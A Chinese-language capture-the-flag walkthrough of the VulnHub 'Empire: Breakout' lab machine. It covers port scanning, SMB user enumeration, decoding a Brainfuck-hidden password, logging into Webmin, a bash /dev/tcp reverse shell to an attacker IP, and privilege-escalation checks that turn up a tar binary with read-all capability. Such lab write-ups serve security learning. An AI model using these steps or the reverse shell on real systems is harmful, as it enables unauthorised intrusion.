breakout

breakout

靶场信息

Empire: Breakout ~ VulnHub

• Filename: 02-Breakout.zip
• File size: 1013 MB
• MD5: C87BC1DB9BD51205B1E9EA441F8222AB
• SHA1: 164DF36D136E5DA83FCCCF503D36A59B0D26E14A

信息收集阶段

1.使用 netdiscover 发现靶机地址

使用netdiscover -i eth0 发现靶场目标信息为192.168.86.138

2.使用nmap进行信息收集

nmap -Pn -sS --stats-every 3m --max-retries 1  --defeat-rst-ratelimit -T4 -p1-65535 -oN /home/kali/2.txt  192.168.86.138

Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-19 21:57 EDT
Nmap scan report for localhost (192.168.86.138)
Host is up (0.0016s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
20000/tcp open  dnp
MAC Address: 00:0C:29:14:59:73 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

接下来，我们发现其开放的端口80,139,445,10000,20000 192.168.86.138 然后对于其后续的端口继续进行扫描

nmap -sV -p 80,139,445,10000,20000 192.168.86.138
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-19 22:15 EDT
Nmap scan report for 192.168.86.138
Host is up (0.00034s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
MAC Address: 00:0C:29:14:59:73 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.48 seconds

然后对于其漏洞信息进行扫描

nmap -A -p80,139,445,10000,20000 192.168.86.138 --script=vuln 192.168.86.138

扫出来一堆漏洞这个不是靶场考察的重点顾咱们忽略

3.通过对于80端口进行信息收集

我们直到
80/tcp open http Apache httpd 2.4.51 ((Debian))
访问80端口发现

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rCmrqb4V-1679305071050)(E:\笔记本\图片\image-20230320105248475.png)]

然后 对其源码进行分析（这个一般靶场才有用）

发现其留下的线索
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

对于密文进行解密

Brainfuck Language - Online Decoder, Translator, Interpreter (dcode.fr)

获得一下信息（可能是密钥）

.2uqPEfj3D<P'a-3

使用 dirsearch对于 80端口进行目录发现

dirsearch -u http://192.168.86.138:80

发现了一个地址，记录了apach的版本信息并未发现漏洞

通过

searchsploit apch 进行检索并未发现利用手段

使用enum4linux进行信息收集

enum4linux 192.168.86.138

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.86.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Users on 192.168.86.138 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
#这里有一个用户名
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''


里面列举了很多信息，暂时我只提取了 smba版本，Usernames
可以通过searchsploit 进行搜索

通过收集的信息对于10000 20000 端口部署的服务

通过cyber + 密钥 登录到了20000端口的应用

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CVw0GP4D-1679305071051)(E:\笔记本\图片\image-20230320165534562.png)]

进入到这个界面后获得普通权限
反弹shell
bash -i /dev/tcp/192.168.86.132/4444 0>&1 2>&1

获得普通权限后进行信息收集

find / -type f -perm -u=s 2>/dev/null
#这里 find / 目录下 所有的文件  并且将报错信息 不显示并且输出到 linux 黑洞中（就是删了）

下一步通过ls-all输出文件信息

cyber@breakout:~$ ls -all
ls -all
total 572
drwxr-xr-x  8 cyber cyber   4096 Oct 20  2021 .
drwxr-xr-x  3 root  root    4096 Oct 19  2021 ..
-rw-------  1 cyber cyber    118 Mar 20 13:33 .bash_history
-rw-r--r--  1 cyber cyber    220 Oct 19  2021 .bash_logout
-rw-r--r--  1 cyber cyber   3526 Oct 19  2021 .bashrc
drwxr-xr-x  2 cyber cyber   4096 Oct 19  2021 .filemin
drwx------  2 cyber cyber   4096 Oct 19  2021 .gnupg
drwxr-xr-x  3 cyber cyber   4096 Oct 19  2021 .local
-rw-r--r--  1 cyber cyber    807 Oct 19  2021 .profile
drwx------  2 cyber cyber   4096 Oct 19  2021 .spamassassin
-rwxr-xr-x  1 root  root  531928 Oct 19  2021 tar
drwxr-xr-x  2 cyber cyber   4096 Oct 20  2021 .tmp
drwx------ 16 cyber cyber   4096 Oct 19  2021 .usermin
-rw-r--r--  1 cyber cyber     48 Oct 19  2021 user.txt

权限检查
cyber@breakout:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
cyber@breakout:~$